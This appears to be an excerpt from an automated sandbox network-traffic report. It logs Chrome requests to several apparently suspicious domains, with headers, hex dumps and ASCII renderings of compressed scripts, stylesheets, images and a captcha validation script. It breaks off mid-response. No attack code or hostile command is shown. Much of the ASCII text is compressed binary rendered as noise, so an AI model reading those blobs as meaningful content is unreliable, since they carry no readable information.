                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:01 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:01 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:41:01 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 30 30 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:00 GMT
                                                                                                                                                          2024-06-09 22:41:01 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/plain;charset=utf-8
                                                                                                                                                          2024-06-09 22:41:01 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:01 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:01 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 34 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 4
                                                                                                                                                          2024-06-09 22:41:01 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:01 UTC34INData Raw: 78 2d 73 65 72 76 65 72 3a 20 41 6b 61 6d 61 69 4e 65 74 53 74 6f 72 61 67 65 28 6a 70 31 35 29 0d 0a
                                                                                                                                                          Data Ascii: x-server: AkamaiNetStorage(jp15)
                                                                                                                                                          2024-06-09 22:41:01 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:01 UTC82INData Raw: 58 2d 56 69 61 3a 20 31 2e 31 20 61 77 73 3a 6a 70 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 2c 20 31 2e 31 20 6f 63 73 61 70 69 3a 30 30 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 0d 0a
                                                                                                                                                          Data Ascii: X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          217192.168.2.549960202.61.87.2194434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:00 UTC362OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                          Host: js326.cc
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          Cookie: com_env=p
                                                                                                                                                          2024-06-09 22:41:00 UTC356INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:00 GMT
                                                                                                                                                          Content-Type: image/x-icon
                                                                                                                                                          Content-Length: 140
                                                                                                                                                          Connection: close
                                                                                                                                                          Last-Modified: Wed, 27 Jun 2018 09:11:10 GMT
                                                                                                                                                          ETag: "5b3354ae-8c"
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:41:00 UTC140INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 00 2e 49 44 41 54 78 da ec ce 31 01 00 00 08 03 a0 69 ff ce 33 86 0f 24 60 da e6 d3 e6 99 80 80 80 80 80 80 80 80 80 80 80 80 80 80 c0 09 30 00 40 b4 03 3d e3 0a 67 49 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR szztEXtSoftwareAdobe ImageReadyqe<.IDATx1i3$`0@=gIIENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          218192.168.2.549964183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:00 UTC555OUTGET /ftl/commonPage/js/websocket/CometMarathon.js HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:01 UTC715INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 3316
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XIANY-MP-09-08
                                                                                                                                                          ETag: W/"6260ddd4-2f13"
                                                                                                                                                          Date: Sat, 08 Jun 2024 01:32:42 GMT
                                                                                                                                                          Last-Modified: Thu, 21 Apr 2022 04:30:12 GMT
                                                                                                                                                          Expires: Mon, 08 Jul 2024 01:32:42 GMT
                                                                                                                                                          Age: 162498
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-204
                                                                                                                                                          x-link-via: dgct63:443;xianymp09:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-XIANY-MP-09-08
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-25
                                                                                                                                                          X-Cdn-Request-ID: de916ebc92e512ceb58dfd9c19baa538
                                                                                                                                                          2024-06-09 22:41:01 UTC3316INData Raw: 1f 8b 08 00 00 00 00 00 00 03 c5 1a 6d 4f 1b 47 fa 3b bf 62 b3 3a 15 93 18 3b d5 7d 39 99 e3 ee c0 b8 0d d7 60 50 4c ee 94 8b 22 6b b1 07 70 6b 76 ad dd 75 38 94 22 39 b9 a4 21 ef d1 35 ef a5 5c 93 a6 29 6d 8f bc b4 55 42 08 6d 7e cc b1 6b f3 29 7f e1 9e 79 d9 d9 99 d9 5d 03 69 a5 ae 10 b6 67 e6 79 9d 67 9e b7 d9 ec fe fd 3d 1a fe cb f6 4c 37 cd 8a 5b b3 4c 6d ac 54 73 51 de 9a 43 ee 98 61 1b ee ac 65 a6 fa b4 53 3d 8b 3d 3d d1 99 4c c3 b6 5c cb 5d 68 20 6d 10 d6 f4 68 f0 64 f7 ef d7 3a 4f 5e f8 cf ce 78 d7 ce f8 37 9f 7a d7 af bc d9 bc e7 5d bf ec af 7d 85 09 e1 35 a5 63 c5 fc a1 23 e3 c5 d1 7f 14 ca 1f 14 8e e5 34 bd 5c 2a e7 c7 c7 0a 93 7a 9a 23 a1 20 5e 6b 13 83 2f 7d e6 bd da e8 bc 5e f1 af 72 24 f9 f1 62 b1 90 9f 1c 1d 2f 96 ff 36 74 f8 68 01 b0 e4
                                                                                                                                                          Data Ascii: mOG;b:;}9`PL"kpkvu8"9!5\)mUBm~k)y]igyg=L7[LmTsQCaeS===L\]h mhd:O^x7z]}5c#4\*z# ^k/}^r$b/6th


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          219192.168.2.549963183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:00 UTC547OUTGET /ftl/commonPage/js/websocket/PopUp.js HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:01 UTC704INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 797
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XY-MP-24-19
                                                                                                                                                          ETag: W/"6260ddd4-828"
                                                                                                                                                          Date: Fri, 07 Jun 2024 01:55:18 GMT
                                                                                                                                                          Last-Modified: Thu, 21 Apr 2022 04:30:12 GMT
                                                                                                                                                          Expires: Sun, 07 Jul 2024 01:55:18 GMT
                                                                                                                                                          Age: 247542
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-204
                                                                                                                                                          x-link-via: dgct63:443;xymp24:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-XY-MP-24-19
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-26
                                                                                                                                                          X-Cdn-Request-ID: 024d3fde901671b674f1ad9ae44a4c5e
                                                                                                                                                          2024-06-09 22:41:01 UTC797INData Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 56 5b 4f d4 40 14 7e ef af 18 9b 0d ed c2 d2 35 31 f1 61 09 51 2e 2f 98 00 26 e0 93 31 64 b6 9d dd 2d f4 96 e9 94 4b 48 13 45 d1 0d 9a 80 09 8a 97 08 91 f8 60 8c c1 35 26 c8 65 f9 37 b4 85 27 ff 82 33 bd ec b6 cb 8a 3e f0 e0 79 99 ed 39 df 9c f3 f5 9c 6f a6 5b 71 0c 99 a8 a6 01 c6 a7 54 82 ee 9a d6 3d 4b cc 83 65 97 e3 da 0e c9 c2 26 31 c9 92 85 c0 20 58 e6 38 40 4d 51 a1 66 56 47 a0 a6 0d 43 79 ae 04 2a 49 1e 51 81 04 d2 0c 21 8a d9 3c c4 80 f9 26 cb b3 74 7b 4e b2 20 b6 d1 9d a9 c9 89 08 39 d0 02 ca a6 61 9b 1a 92 54 a3 62 8a fc d9 de ee f9 9b d5 e0 fb b1 b7 fd fc f4 e0 88 07 7d 49 16 c9 76 ca b6 8c d5 32 9a 66 94 fa 00 1f bc 7b 12 c3 57 0e fd cd 7d af de f0 f7 eb fe a3 6f bf 9a 2f fc fa 86 b7 b6 73 d6 78 1c 6c 7e f6 de
                                                                                                                                                          Data Ascii: V[O@~51aQ./&1d-KHE`5&e7'3>y9o[qT=Ke&1 X8@MQfVGCy*IQ!<&t{N 9aTb}Iv2f{W}o/sxl~


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          220192.168.2.54996713.32.99.1104434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:00 UTC566OUTGET /ocs/cc.png?1717972858650 HTTP/1.1
                                                                                                                                                          Host: ocsapi-aka.blackkhaki918.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://js326.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:01 UTC486INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 332
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:01 GMT
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Api-Elapsed: 0.0000
                                                                                                                                                          X-Node: outer
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                          Via: 1.1 a54cda8ccda3480314f451558e4dd062.cloudfront.net (CloudFront)
                                                                                                                                                          X-Amz-Cf-Pop: FRA60-P3
                                                                                                                                                          X-Amz-Cf-Id: Ujf7h_0q3hcrmomHv4eebASYtaWYhJ3zoEm5PZOaDYG1dse_W3hpPA==
                                                                                                                                                          2024-06-09 22:41:01 UTC332INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff c0 00 0b 08 00 01 00 01 01 01 11 00 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93
                                                                                                                                                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          221192.168.2.549966183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:00 UTC561OUTGET /ftl/commonPage/themes/hb/css/pc.css HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:01 UTC683INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Content-Length: 911
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XIANY-MP-09-10
                                                                                                                                                          ETag: W/"5d848f4f-b5d"
                                                                                                                                                          Date: Fri, 07 Jun 2024 11:12:22 GMT
                                                                                                                                                          Last-Modified: Fri, 20 Sep 2019 08:35:27 GMT
                                                                                                                                                          Expires: Sun, 07 Jul 2024 11:12:22 GMT
                                                                                                                                                          Age: 214119
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-206
                                                                                                                                                          x-link-via: dgct63:443;xianymp09:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-XIANY-MP-09-10
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-DG-CT-63-26
                                                                                                                                                          X-Cdn-Request-ID: c90dd146600ce8bb71f99a2c064ca7bb
                                                                                                                                                          2024-06-09 22:41:01 UTC911INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 55 df 8f 9b 38 10 7e e7 af f0 29 ba 36 d9 2b c4 90 40 1a d0 ea 74 8d ba 6a 1f aa 56 ea bd af 0c 38 c4 5a c7 46 e0 6c 92 46 fb bf 77 30 0e 71 36 e4 b6 3f 5e 8f d5 2a 66 98 f9 66 be 99 cf f6 20 93 42 11 26 68 75 d8 b2 5c ad e2 e9 3c 28 77 c9 8a b2 62 a5 e2 08 37 2f a5 ac 99 62 52 c4 88 a4 b5 e4 1b 45 13 25 cb 18 85 f8 cf 84 d3 a5 6a 57 48 3e d2 6a c9 e5 36 46 2b 96 e7 54 24 6b 52 15 4c b8 ad 8b 1b 4c 23 c0 32 36 1d ef 4e b0 0f a6 9c d5 25 27 fb 18 a5 5c 66 0f c9 93 e3 31 51 6e d4 82 93 ba 3e 2c a1 3c b7 66 df 68 8c fc a8 bf 16 b9 51 1c 08 c4 48 48 41 93 94 64 0f 45 25 37 22 8f 51 55 a4 64 88 df e8 bf 51 92 ca 2a a7 95 71 53 74 a7 5c c2 59 01 48 4d 81 90 76 7c e3 e5 ec b1 4d db f6 02 f9 18 88 99 5e b4 2f d7 7a 81 4d 27 f0 89
                                                                                                                                                          Data Ascii: U8~)6+@tjV8ZFlFw0q6?^*ff B&hu\<(wb7/bRE%jWH>j6F+T$kRLL#26N%'\f1Qn>,<fhQHHAdE%7"QUdQ*qSt\YHMv|M^/zM'


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          222192.168.2.549965183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:00 UTC580OUTGET /061410/rcenter/common/static/js/gb.validation.min.js?v=1717580749344 HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:01 UTC707INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 32727
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XY-MP-212-09
                                                                                                                                                          ETag: "633d510e-7fd7"
                                                                                                                                                          Date: Thu, 06 Jun 2024 12:05:08 GMT
                                                                                                                                                          Last-Modified: Wed, 05 Oct 2022 09:40:30 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 12:05:08 GMT
                                                                                                                                                          Age: 297353
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-205
                                                                                                                                                          x-link-via: dgct63:443;xymp212:80;
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-XY-MP-212-09
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-DG-CT-63-07
                                                                                                                                                          X-Cdn-Request-ID: e9d36cf86a56349e094f9cb5ae0272a3
                                                                                                                                                          2024-06-09 22:41:01 UTC15677INData Raw: 28 66 75 6e 63 74 69 6f 6e 20 28 63 2c 20 6d 2c 20 72 2c 20 74 29 20 7b 0a 20 20 20 20 76 61 72 20 6f 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 74 2c 20 69 29 20 7b 0a 20 20 20 20 20 20 20 20 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 20 3d 20 74 2c 20 74 68 69 73 2e 64 65 66 61 75 6c 74 73 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 79 70 65 3a 20 31 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 6f 64 65 3a 20 22 66 69 78 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 4f 66 66 73 65 74 3a 20 35 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 53 70 61 63 65 3a 20 35 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 65 78 70 6c 61 69 6e 3a 20 22 e5 90 91 e5 8f b3 e6 bb 91 e5 8a a8 e5 ae 8c e6 88 90 e9 aa 8c e8 af 81 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                          Data Ascii: (function (c, m, r, t) { var o = function (t, i) { this.$element = t, this.defaults = { type: 1, mode: "fixed", vOffset: 5, vSpace: 5, explain: "",
                                                                                                                                                          2024-06-09 22:41:01 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 6d 67 5f 68 65 69 67 68 74 3a 20 73 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 72 5f 77 69 64 74 68 3a 20 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 72 5f 68 65 69 67 68 74 3a 20 6f 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6c 6f 63 6b 5f 77 69 64 74 68 3a 20 68 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6c 6f 63 6b 5f 68 65 69 67 68 74 3a 20 6e 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 69 72 63 6c 65 5f 72 61 64 69 75 73 3a 20 72 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 2c 20 72 61 6e 64 53 65 74 3a 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 68 69 73 2e 79
                                                                                                                                                          Data Ascii: img_height: s, bar_width: e, bar_height: o, block_width: h, block_height: n, circle_radius: r } }, randSet: function () { this.y
                                                                                                                                                          2024-06-09 22:41:01 UTC666INData Raw: 6f 6d 73 2e 69 6d 67 5f 63 61 6e 76 61 73 2e 61 74 74 72 28 22 73 72 63 22 2c 20 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 22 20 2b 20 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 62 61 63 6b 49 6d 67 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 20 3d 20 22 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 66 6f 6e 74 50 6f 73 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 20 2b 3d 20 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 66 6f 6e 74 50 6f 73 5b 69 5d 20 2b 20 22 2c 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 68 69 73 2e 68 74 6d
                                                                                                                                                          Data Ascii: oms.img_canvas.attr("src", "data:image/png;base64," + this.options.backImg); var t = ""; for (var i = 0; i < this.options.fontPos.length; i++) { t += this.options.fontPos[i] + "," } this.htm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          223192.168.2.54996818.239.36.24434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:00 UTC562OUTGET /ocs/cc.png?1717972858649 HTTP/1.1
                                                                                                                                                          Host: ocsapi-aws.bakeddove.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://js326.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:01 UTC486INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 332
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:01 GMT
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Api-Elapsed: 0.0000
                                                                                                                                                          X-Node: outer
